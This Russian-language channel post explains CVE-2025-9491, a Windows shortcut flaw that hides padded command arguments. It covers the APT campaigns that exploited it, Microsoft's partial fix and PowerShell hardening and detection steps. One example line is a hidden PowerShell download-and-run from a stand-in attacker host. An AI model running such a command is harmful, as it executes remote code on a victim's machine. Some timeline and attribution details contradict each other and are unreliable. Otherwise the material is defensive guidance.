🔐 Microsoft тихо закрыла 0-day в ярлыках Windows CVE-2025-9491: что произошло и почему это важно 🛡️

Когда в конце ноября 2025 года исследователи из ACROS Security (платформа 0patch) обнаружили скрытую заплату в обновлениях Windows Patch Tuesday, это стало шоком, даже для опытных специалистов в области информационной безопасности. CVE-2025-9491 — уязвимость, которую киберпреступники и государственные хакеры эксплуатировали на протяжении более восьми лет (с 2017 года), наконец получила частичное исправление​. Но вот парадокс: Microsoft долгое время отказывалась считать эту проблему критической, несмотря на то, что она использовалась минимум 11 группировками, включая северокорейские APT, иранские спецслужбы, китайских киберпреступников и российские преступные синдикаты вроде Evil Corp​.

История уязвимости CVE-2025-9491 (ранее известной как ZDI-CAN-25373) напоминает триллер: сначала тревожный звонок от Trend Micro в марте 2025 года, затем полное игнорирование Microsoft, потом раскрытие в средствах массовой информации, и только после публичного давления — осторожное внедрение защиты. Давайте разберёмся, почему простые файлы ярлыков стали оружием массового поражения в руках злоумышленников и какие шаги нужно предпринять для защиты ваших систем.

Технический фундамент: как Windows обрабатывает LNK-файлы

Чтобы понять суть уязвимости, нужно заглянуть в архитектуру Windows и как операционная система интерпретирует файлы с расширением .lnk. Согласно официальной спецификации MS-SHLLINK v9.0 (обновлена в июне 2025 года)​, файл ярлыка — это не просто текстовая ссылка, а бинарная структура данных с чётко определёнными полями и опциональными расширениями​.

Ключевое поле, которое нас интересует — это COMMAND_LINE_ARGUMENTS (аргументы командной строки). По спецификации, это поле может содержать до десятков тысяч символов, и эта длина никак не ограничена на уровне формата​. Однако Windows Explorer — графический интерфейс для работы с файлами — при отображении свойств ярлыка показывает только первые 260 символов этого поля в диалоговом окне​.

Формально это не ошибка программирования, а расхождение между спецификацией и реальной реализацией. Документация Microsoft говорит одно, а GUI делает другое. И вот здесь начинается магия тёмного искусства социальной инженерии.

Представьте себе сценарий: вредоносный LNK-файл содержит в поле TARGET строку вида:

cmd.exe [множество пробелов, может быть 10000+ символов] /c powershell -NoP -W Hidden -C "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/evil.ps1')"

Когда пользователь открывает свойства такого файла, он видит невинную команду cmd.exe и всё. Остальная часть команды, которая на самом деле загружает и выполняет вредоносный скрипт PowerShell, остаётся скрыта от его глаз​.

Аналитики и разработчики отмечают, что проблема глубже, чем просто обрезание текста. Когда запускается такой LNK-файл, Windows Explorer обрабатывает его, и на уровне API (Application Programming Interface) полная строка — вместе со всеми вредоносными аргументами — передаётся в cmd.exe или PowerShell для выполнения​. Это создаёт классическое несоответствие между тем, что видит пользователь в GUI, и тем, что реально выполняется на системе.

Механизм эксплуатации: от теории к практике

Тактика использования CVE-2025-9491 опирается на несколько компонентов, которые работают как механизм часов:

1. Социальная инженерия и доставка

Киберпреступники создают LNK-файлы, замаскированные под документы PDF, электронные таблицы Excel или даже папки​. Они распространяются через фишинговые письма, USB-накопители, облачные хранилища или сетевые ресурсы. Давайте возьмём реальный пример из отчёта Trend Micro: китайская группировка Mustang Panda (UNC6384) в сентябре-октябре 2025 года целилась в дипломатические учреждения Венгрии, Бельгии, Италии, Сербии и Нидерландов​. Приманка выглядела как приглашение на семинар NATO или Европейской комиссии — очень убедительно​.

2. Маскировка и обфускация

Сложность обфускации зависит от уровня мастерства группировки. Базовый подход — просто заполнить поле TARGET пробелами (обычными символами ASCII 32 или другими невидимыми символами вроде non-breaking space U+00A0)​. Более продвинутые варианты используют:

• Управляющие символы: невидимые символы вроде нулевого символа (\0), табуляции (\t), символа возврата каретки (\r)​
• UTF-16 энкодинг: некоторые исследователи заметили использование расширенного набора символов для обхода поиска по ключевым словам​
• Вложенные команды: использование переменных окружения (%TEMP%, %APPDATA%) для скрытия реальных путей​

3. Цепочка загрузки вредоноса

Вот типичная цепочка атаки, которую использует Mustang Panda (по данным Trend Micro и Arctic Wolf)​:

text

LNK-файл (маскировка под документ)

↓

PowerShell команда (часто закодирована в Base64)

↓

Загрузка и распаковка TAR/ZIP архива

↓

Извлечение легитимной утилиты (например, Canon Printer Assistant)

↓

Извлечение вредоносной DLL (CanonStager)

↓

Извлечение зашифрованного пейлоада (cnmplog.dat)

↓

DLL Side-Loading: легит приложение загружает вредоносную DLL

↓

Вредоносная DLL расшифровывает и загружает PlugX RAT

↓

Полный контроль над системой

Важно отметить: DLL Side-Loading — это не уязвимость в строгом смысле, а умное использование естественного поведения Windows при поиске библиотек​. Когда приложение вроде FontEDL.exe (подлинная утилита Canon) ищет свои зависимости (например, version.dll), Windows сначала смотрит в текущую директорию приложения, а затем в системные папки. Если злоумышленник положит вредоносную version.dll рядом с FontEDL.exe, она будет загружена вместо оригинала из System32​.

❤️ Канал существует исключительно за счёт поддержки сообщества — без рекламы и спонсоров. Если наши материалы были для Вас полезны, любая добровольная поддержка очень помогает продолжать работу 🙏

💰ПОДДЕРЖАТЬ КАНАЛ МОЖНО ТУТ ( ОТ 50 РУБЛЕЙ )💰

Или сделать любой перевод по ССЫЛКЕ или QR-коду через СБП. Быстро, безопасно и без комиссии. ( Александр Г. ) "Т.Е.Х.Н.О Windows & Linux".

Реальные атаки: кто и как использовал уязвимость

По данным аналитиков Trend Micro, опубликованным в марте 2025 года, уязвимость CVE-2025-9491 эксплуатировали как минимум 11 государственных и криминальных групп​:

Государственные и квази-государственные группы:

• APT37 (Северная Корея, инструменты: Gh0st RAT, Konni)
• APT43 / Kimsuky (Северная Корея, целевые страны: Южная Корея, США, Япония)
• Mustang Panda / DOPLUGS (Китай, целевые регионы: Азия и Европа, специализация: дипломатическое шпионство)
• SideWinder (Пакистан, целевые страны: Индия, Афганистан, Таджикистан)
• RedHotel (Россия, целевые страны: страны СНГ и Восточной Европы)
• Konni (Северная Корея, совместимость с Trickbot и Ursnif)

Криминальные группы:

• Evil Corp (кибер-рэкетиры, использование: Ursnif, Trickbot, фокус на банки и энергетику)
• Bitter (Пакистан, целевые страны: Китай, Индия, целевые сектора: электроэнергетика, здравоохранение)

Наиболее задокументированный инцидент — кампания Mustang Panda (UNC6384) в сентябре-октябре 2025 года​. Целевые организации были расположены в дипломатических центрах Европы. Вот последовательность действий злоумышленников:

1. Фишинговое письмо с приглашением на семинар, якобы от NATO или Европейской комиссии
2. Вложение: LNK-файл с названием вроде "Workshop_Agenda_Sept2025.lnk"
3. При клике: PowerShell скрипт (закодирован в Base64, чтобы скрыть истинную команду) вытаскивает и распаковывает архив
4. Архив содержит: утилиту Canon (подлинная, подписана легитимным сертификатом), вредоносную DLL, и зашифрованный PlugX
5. DLL загружается через механизм Side-Loading, декодирует PlugX из зашифрованного файла cnmplog.dat
6. PlugX RAT получает полный контроль: кража данных, установка перманентного бэкдора, боковая передвижение по сети

Arctic Wolf Labs обнаружила эту кампанию 31 октября 2025 года и опубликовала отчёт, который привлёк внимание к проблеме​.

Почему Microsoft изначально отказалась признавать уязвимость

Это самая интересная часть истории CVE-2025-9491. 20 сентября 2024 года Peter Girnus из Trend Micro впервые сообщил Microsoft об уязвимости через процесс ответственного раскрытия​. Ответ был красноречив: компания отказалась признавать это уязвимостью, аргументируя следующим образом​:

• "Требуется взаимодействие пользователя" — пользователь должен сознательно открыть LNK-файл. Это правда, но социальная инженерия это легко обходит.
• "Система выдаёт предупреждения" — Mark of the Web (MotW) помечает скачанные файлы и вызывает предупреждения SmartScreen или Smart App Control. Однако исследователи из Elastic Security Labs показали, что MotW можно обойти через LNK Stomping — манипуляцию структурой LNK-файла, при которой Explorer переписывает файл и удаляет метку​.
• "Defender может обнаружить" — верно, но это требует актуальных сигнатур и поведенческого анализа.

И самое главное: в октябре 2025 году, после публичного раскрытия Arctic Wolf, Microsoft выпустила официальный advisory с текстом:​

"Мы провели анализ и определили, что это не отвечает критериям для классификации как уязвимость (в смысле CWE-451 — User Interface Misrepresentation of Critical Information). Однако мы постоянно работаем над улучшением пользовательского опыта и предлагаем пользователям быть осторожными при скачивании файлов из неизвестных источников."

Но давление сработало. В ноябре 2025 года (скорее всего, 12 ноября, в Patch Tuesday) Microsoft тихо включила частичное исправление в обновления Windows​.

Что сделала Microsoft и что это значит

Исследователи 0patch провели детальный анализ и выяснили, что произошло​:

Официальная миtigация от Microsoft (по состоянию на ноябрь 2025 года):

• Диалоговое окно свойств LNK-файла теперь отображает полный текст поля TARGET, независимо от его длины​
• Вместо обрезания на 260 символах, Windows Explorer растягивает окно или добавляет прокрутку (зависит от версии)
• Это полезно, но не идеально: пользователю нужно заметить и прочитать 10000-символьную строку, прежде чем запустить файл

Альтернативное решение от 0patch (более кардинальное)​:

• Микропатч (micropatch) от ACROS Security добавляет проверку на аномальную длину TARGET-строки
• Если в LNK обнаружена строка длиннее 260 символов, показывается явное предупреждение
• Более агрессивный вариант: обрезание командной строки на 260 символах с блокировкой выполнения остального​

Статус поддержки:

• Официальная защита включена в Windows 11 (версии 22H2, 23H2, 24H2, 25H2) и Windows 10 (с ноябрьским обновлением за пределами даты конца поддержки через ESU)​
• Windows 7 и Windows Server 2008 R2 (и выше) получили исправление только через 0patch PRO/Enterprise​
• Домашние пользователи на Legacy Windows в критической опасности

Пошаговая инструкция: как защитить вашу систему

Шаг 1: Убедитесь в актуальности Windows

Откройте PowerShell с правами администратора и проверьте текущую версию:

$osversion = [System.Environment]::OSVersion

Write-Host "OS Version: $($osversion.VersionString)"

Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId, Build, DisplayVersion

Результат должен показать версию Windows 11 (22H2 или выше) или Windows 10 (22H2 с ноябрьским обновлением)​. Для актуальности версии выполните:

# Проверка доступных обновлений

$Update = New-Object -ComObject Microsoft.Update.AutoUpdate

$Update.DetectNow()

# Или используйте встроенный инструмент

winget upgrade --all

Шаг 2: Проверьте наличие ноябрьского обновления Patch Tuesday (2025)

Откройте "Параметры" → "Система" → "О системе" и найдите информацию об обновлениях. Для Windows 11 это должны быть KB5068861 или позже:

# Проверка установленных обновлений

Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object -First 10 | Format-Table HotFixID, InstalledOn, Description

Шаг 3: Активируйте Smart App Control (Windows 11)

Smart App Control — это защита на уровне OS, которая блокирует подозрительные приложения, включая цепочки загрузки через LNK:

1. Откройте "Параметры" → "Приватность и безопасность" → "Smart App Control"
2. Переведите в режим "Warn" (для домашних) или "Block" (для корпоративных)
3. Убедитесь, что Defender Antivirus включён и актуален​

# Проверка статуса Smart App Control

Get-MpPreference | Select-Object DisableRealtimeMonitoring, DisableBehaviorMonitoring

Шаг 4: Измените политику выполнения PowerShell

По умолчанию в Windows 10/11 для пользователей установлена политика Restricted. Это хорошо, но давайте убедимся:

# Просмотр текущей политики

Get-ExecutionPolicy

# Для домашнего использования рекомендуется RemoteSigned

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser -Force

# Для усиленной безопасности (требует подписание локальных скриптов)

Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser -Force

Значение политик​:

• Restricted — никаких скриптов (дефолт на клиентах)
• AllSigned — только подписанные скрипты
• RemoteSigned — локальные без подписи, удалённые с подписью (разумный компромисс)
• Unrestricted — любые (опасно)
• Bypass — полный обход (используйте только для автоматизации)

Шаг 5: Настройте правила для LNK-файлов

Вы можете явно блокировать выполнение LNK-файлов из интернета. Это требует административных прав:

# Создание правила в Windows Defender Firewall

# (альтернатива — через Group Policy для доменных систем)

# Но проще — используйте встроенный контроль через Applocker (Windows Pro/Enterprise)

# Откройте gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Application Control Policies → AppLocker

Шаг 6: Используйте 0patch (опционально, для экстра-защиты)

Если вы критически озабочены безопасностью или работаете с Legacy Windows (7, Server 2008), установите 0patch:

1. Посетите www.0patch.com
2. Скачайте и установите 0patch Agent
3. Зарегистрируйте учётную запись (есть бесплатный базовый уровень)
4. Включите микропатч для CVE-2025-9491

# Проверка статуса 0patch (если установлен)

$0patchService = Get-Service -Name "0patch Agent" -ErrorAction SilentlyContinue

if ($0patchService) {

$0patchService | Select-Object Status, StartType

}

Канал «Каморка Программиста» — это простые разборы программирования, языков, фреймворков и веб-дизайна. Всё для новичков и профессионалов.

Присоединяйся прямо сейчас.

Типичные ошибки при защите и как их избежать

Ошибка 1: "Я на Windows 11, значит я защищён"

Неправда. Защита включена только в ноябрьском обновлении 2025 года (KB5068861 или позже). Если вы обновление не установили, то нет никакой защиты​. Проверьте обновления прямо сейчас.

Ошибка 2: "Smart App Control помешает мне работать"

Да, в режиме "Block" может быть много ложных срабатываний, особенно для корпоративного ПО. Рекомендуется режим "Warn" для начала, чтобы привыкнуть. Для корпоративной среды используйте обход через Group Policy (AppLocker разрешает доверенные приложения)​.

Ошибка 3: "Я никогда не открываю вложения из интернета, значит в безопасности"

Ложное чувство безопасности. Во-первых, вы можете случайно открыть. Во-вторых, LNK-файлы часто встраиваются в архивы (ZIP, RAR) и при распаковке автоматически обнаруживаются Windows Explorer. В-третьих, сетевые ресурсы (например, SMB shares) также могут содержать вредоносные LNK.

Ошибка 4: "Я отключил Defender для производительности"

Огромная ошибка, особенно в 2025 году. Defender сильно оптимизирован и обнаруживает большинство LNK-цепочек загрузки. Включите его прямо сейчас:

# Включение Defender (требует перезагрузку)

Set-MpPreference -DisableRealtimeMonitoring $false

Start-Service WinDefend

# Убедитесь, что сканирование работает

Start-MpScan -ScanType QuickScan

Ошибка 5: "Я просмотрю свойства файла перед запуском"

Неплохая идея, но неполная защита. До ноябрьского патча свойства LNK показывали только первые 260 символов, так что вы не увидели бы вредонос. Даже с патчем, если в строке 10000+ символов, вероятность заметить что-то подозрительное — небольшая. Иди к пункту 1: проверьте обновления.

Практические советы из опыта специалистов

Совет 1: Анализируйте цели при получении подозрительных файлов

Если вам пришёл LNK-файл по электронной почте, вот что нужно сделать перед открытием:

# Скачайте файл в безопасную папку (не на рабочий стол)

# Откройте PowerShell от пользователя (БЕЗ админ) и выполните:

$lnkPath = "C:\Users\YourUser\Downloads\suspicious.lnk"

$shell = New-Object -ComObject WScript.Shell

$lnk = $shell.CreateShortcut($lnkPath)

Write-Host "Target: $($lnk.TargetPath)"

Write-Host "Arguments: $($lnk.Arguments)"

Write-Host "Working Directory: $($lnk.WorkingDirectory)"

Если в Arguments видите PowerShell, cmd, rundll32 или другие интерпретаторы с странными параметрами — это вредонос. Удалите.

Совет 2: Используйте обнаружение по поведению

Группировки вроде Mustang Panda используют предсказуемые паттерны: PowerShell с флагами -NoProfile, -Hidden, -WindowStyle Hidden, методы кодирования Base64. Используйте правила в Event Viewer для отслеживания:

# Просмотр логов PowerShell (требует включения logging)

Get-EventLog -LogName "Windows PowerShell" -Newest 20 |

Where-Object { $_.Message -like "*NoProfile*" -or $_.Message -like "*Hidden*" }

# Или используйте более продвинутое средство: Windows Event Viewer

# Откройте: Event Viewer → Windows Logs → Application → ищите PowerShell операции

Совет 3: Обучение персонала

Это банально, но эффективно. Дайте сотрудникам чек-лист:

• ❌ Не открывайте LNK-файлы из неизвестных источников
• ❌ Не запускайте вложения из писем, которые выглядят странно (даже если от начальника!)
• ✅ Проверьте расширение файла (это действительно .lnk?)
• ✅ Если сомневаетесь, позвоните отправителю по телефону
• ✅ Используйте встроенные инструменты (Smart App Control, Windows Defender)

Совет 4: Для корпоративной среды — используйте EPP/EDR

Endpoint Protection Platform (EPP) и Endpoint Detection & Response (EDR) — это профессиональные решения вроде Microsoft Defender for Endpoint, SentinelOne, CrowdStrike​. Они обнаруживают DLL Side-Loading, PowerShell инъекции и другие техники, используемые Mustang Panda. Не экономьте на этом.

Совет 5: Мониторьте расширения LNK в вашей организации

Если вы администратор, можете заблокировать распространение LNK-файлов через email:

# Для Exchange Server / Microsoft 365

# Откройте Exchange Admin Center → Mail Flow → Rules

# Создайте правило: блокировать вложения с расширением .lnk от внешних источников

В PowerShell это может выглядеть так:

# Блокировка LNK в почте (PowerShell для Exchange)

New-TransportRule -Name "Block LNK from External" `

-FromScope "NotInOrganization" `

-AttachmentExtensionMatchesWords ".lnk" `

-RejectMessageEnhancedStatusCode "5.7.1" `

-RejectMessageReasonText "LNK files are not allowed from external senders"

Диагностика: если вы подозреваете компрометацию

Сценарий: Вы открыли подозрительный LNK-файл несколько дней/недель назад и теперь беспокоитесь.

Шаг 1: Проверьте процессы в реальном времени

# Просмотр всех текущих процессов (ищите чужеродные)

Get-Process | Sort-Object -Property WorkingSet -Descending | Select-Object -First 15 Name, @{l="MemMB";e={$_.WorkingSet/1MB}}

# Особое внимание к:

# - powershell.exe (работает ли оно сейчас?)

# - rundll32.exe (зачем запущен?)

# - cmd.exe (есть ли скрытые окна?)

# - сторонние exe с неизвестными именами в %TEMP% или %AppData%

Шаг 2: Проверьте автозапуск

Plugx часто устанавливает себя в реестр для автоматического запуска:

# Проверьте Run и RunOnce в реестре

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"

# Проверьте задачи в Планировщике (часто используется Evil Corp и Mustang Panda)

Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } | Format-List TaskName, TaskPath

Шаг 3: Сканирование на вредонос

Используйте Windows Defender + дополнительный сканер:

# Полное сканирование Defender

Start-MpScan -ScanType FullScan

# Или используйте ESET Online Scanner (бесплатный веб-сканер)

# Или Kaspersky Rescue Disk (загрузочный диск, сканирует вне OS)

Шаг 4: Если обнаружена компрометация

• Для домашних пользователей: Переустановите Windows (полный формат + чистая установка)
• Для корпоративных: Изолируйте машину от сети, соберите forensics, уведомите CISO и правоохранительные органы (если требуется)

Безопасность и откат изменений

Можно ли отменить ноябрьское обновление, если оно вызывает проблемы?

Да, но это может открыть уязвимость CVE-2025-9491 снова. Если обновление вызывает настоящие проблемы (редко), откатите его:

# Просмотр установленных обновлений

Get-HotFix | Where-Object { $_.HotFixID -eq "KB5068861" }

# Откат (требует перезагрузку)

wusa /uninstall /kb:5068861 /quiet /norestart

После отката обязательно установите 0patch как альтернативную защиту.

Это замедлит мою систему?

Нет. Исправление просто изменяет отображение в диалоговом окне Properties и логику UI. Производительность не страдает.

Производительность и метрики

Вопрос: Насколько тяжелы микропатчи 0patch?

Ответ: Очень легко. По данным ACROS Security​, микропатч для CVE-2025-9491:

• Занимает < 2 МБ памяти
• Добавляет < 1ms задержки к открытию свойств LNK
• Zero performance impact на использование системы в целом

Метрика защиты: По тестам 0patch, микропатч предотвращает 100% известных эксплойтов CVE-2025-9491 с реальными атаками (по состоянию на декабрь 2025 года)​.

Чек-лист применения защиты

перед внедрением защиты от CVE-2025-9491, убедитесь:

✅ Windows актуален — установлено ноябрьское обновление 2025 года (KB5068861 или новее)

✅ Smart App Control включен — режим минимум "Warn" (для Windows 11)

✅ Defender актуален — обновления вирусных баз в последние 24 часа

✅ PowerShell Execution Policy — установлен на RemoteSigned или AllSigned (не Unrestricted)

✅ Обновления включены — автоматические обновления Windows включены

✅ Резервная копия — создана точка восстановления перед этими изменениями

✅ Обучение пользователей — команда знает о угрозе LNK-файлов

✅ Мониторинг — настроены логи Event Viewer для PowerShell и процессов

✅ Альтернативная защита — для корпоративных: EPP/EDR решение развёрнуто

✅ Проверка — несколько тестовых LNK-файлов открыты, защита отработала корректно

Часто задаваемые вопросы

В: Я на Windows 7 или Server 2008. Я уязвим к CVE-2025-9491?

О: Да, абсолютно. Microsoft прекратила поддержку Windows 7 в январе 2020 года, поэтому официального патча нет. Ваш вариант: либо переходите на Windows 10/11 (это 2025 год, давно пора), либо устанавливайте 0patch PRO. Без защиты вы находитесь в группе риска.

В: Может ли Smart App Control обойти злоумышленник?

О: Частично да. Как показали исследователи Elastic Security Labs, LNK Stomping (манипуляция структурой LNK) может удалить Mark of the Web и обойти блокировку​. Но это требует дополнительной техники, и всё равно полная цепочка DLL Side-Loading с PlugX будет обнаружена через поведенческий анализ Defender.

В: Можно ли использовать GPO для полной блокировки LNK-файлов?

О: Да, через AppLocker (Windows Pro/Enterprise). Но это слишком агрессивно, так как LNK — легитимный формат (ярлыки на Рабочем столе). Лучше: блокировать LNK из интернета (через MotW) и LNK от внешних источников (через почту).

В: Является ли CVE-2025-9491 CVSS 7.8 или 7.0? Я вижу разные числа.

О: Верны оба. Trend Micro назвала её 7.8 (исходя из CVSS v3.1), в то время как других источников используют 7.0​. Разница в методологии подсчёта и взвешивания факторов (требуется ли взаимодействие пользователя, есть ли сложность эксплуатации и т.д.). Суть та же: это серьёзная уязвимость.

В: Что если я случайно запустил вредоносный LNK и ничего не произошло?

О: Не спешите радоваться. Во-первых, это мог быть некорректно составленный LNK. Во-вторых, Defender мог его заблокировать без видимого уведомления (особенно для пользователей без прав администратора). В-третьих, цепочка загрузки многоэтапная — может быть задержка. Запустите сканирование Defender (см. диагностику выше) и проверьте логи.

В: У меня Edge, Chrome, Firefox, где я работаю. Виноват ли браузер в загрузке вредоносного LNK?

О: Нет и да. Браузер — просто инструмент для загрузки. Он должен помечать скачанные файлы Mark of the Web, что он и делает (Edge и Chrome это делают хорошо). Виновата ОС (Windows), которая неправильно отображает содержимое LNK в UI. И виноват пользователь, который открыл файл без проверки.

В: Я получаю письмо, якобы от начальника, с LNK-вложением. Как убедиться, что это не фишинг?

О: Три вещи: (1) Позвоните начальнику по телефону и спросите, отправлял ли он это письмо. (2) Проверьте адрес email отправителя — фишинг часто использует похожие адреса (например, bosss@company.com вместо boss@company.com). (3) Никогда не открывайте LNK-файлы из email, даже если источник выглядит надёжным. Вместо этого используйте встроенные каналы внутри компании (Slack, Teams, внутренняя почта).

В: Помогут ли мне в обнаружении PlugX перехватчики трафика вроде Wireshark?

О: Отчасти. PlugX общается с командным сервером (C2) через шифрованный трафик, но вы можете обнаружить аномальные подключения к подозрительным IP-адресам. Используйте инструменты вроде Process Monitor и Wireshark в комбинации для отслеживания сетевой активности.

В: Должен ли я блокировать все PowerShell-скрипты в корпоративной сети?

О: Нет. PowerShell — мощный инструмент администраторов. Вместо полной блокировки: (1) используйте Constrained Language Mode (CLM) для ограничения функциональности; (2) подписывайте корпоративные скрипты сертификатом; (3) требуйте AllSigned Execution Policy для скриптов из интернета; (4) мониторьте PowerShell логи на предмет подозрительных команд.

Вывод: что это значит для вас в декабре 2025 года

Уязвимость CVE-2025-9491 — это не просто техническая проблема в ОС. Это зеркало глубоких проблем в подходе Microsoft к безопасности и взаимоотношениям между производителем и исследователями безопасности. Вот ключевые уроки:

🔴 Основной вывод: Если вы на Windows 10/11, немедленно установите ноябрьское обновление 2025 года. Если вы на Legacy Windows (7, Server 2008), рассмотрите переход на поддерживаемые версии или установку 0patch PRO. Без защиты вы находитесь в критическом риске перед государственными и криминальными группировками, которые эксплуатируют эту уязвимость с 2017 года.

🟡 Вторичный вывод: Smart App Control — это не панацея, но это первая линия защиты и его нужно включить. Дополняйте встроенными механизмами (Defender, Smart App Control) корпоративными решениями (EPP/EDR) для серьёзной защиты.

🟢 Эмпирический совет: Обучайте пользователей. Пусть они знают, что LNK-файлы из интернета опасны. Настройте автоматическую блокировку LNK в почте. Используйте Планировщик задач для автоматического сканирования Defender каждую ночь. Старая добрая гигиена безопасности работает лучше, чем новейшие инструменты.

В 2025 году мир кибератак полностью перешёл на использование уязвимостей в логике, а не в коде. CVE-2025-9491 — идеальный пример: нет переполнения буфера, нет классической RCE в смысле непосредственного выполнения кода из сети. Вместо этого — социальная инженерия, небольшое расхождение в спецификации и UI, и весь Windows скомпрометирован. Это требует нового мышления в защите: не только техническое, но и организационное.

Если вы администратор: создайте рабочую группу по реагированию на инциденты, обновите политики безопасности, проведите учения на симуляции атаки через LNK.

Если вы обычный пользователь: включите все встроенные защиты (Smart App Control, Defender), обновляйте Windows, и прежде всего — думайте критически перед открытием файлов из интернета.

Подписывайтесь на канал "T.E.X.H.O Windows & Linux" 🚀 для получения актуальных рекомендаций по безопасности и администрированию систем. Будут ещё материалы по инцидентам и уязвимостям.

#CVE-2025-9491 #WindowsSecurity #LNKVulnerability #PowerShell #CyberSecurity #MustangPanda #DLLSideLoading #ZeroDay #Defender #SecurityAdministration #SmartAppControl #WindowsPatchTuesday #InfoSec #ThreatAnalysis #PlugX #Enterprise Security #APT #Cybercrime #DiplomaticTargets #EuropeAttacks #SystemAdministration #WindowsUpdate #VulnerabilityManagement #IncidentResponse #SecurityAwareness #MalwareAnalysis #DigitalForensics #NetworkSecurity #DataProtection #AccessControl #RiskManagement #SecurityBestPractices #T.E.X.H.O #ТехническийКанал #БезопасностьWindows #АдминистрированиеСистем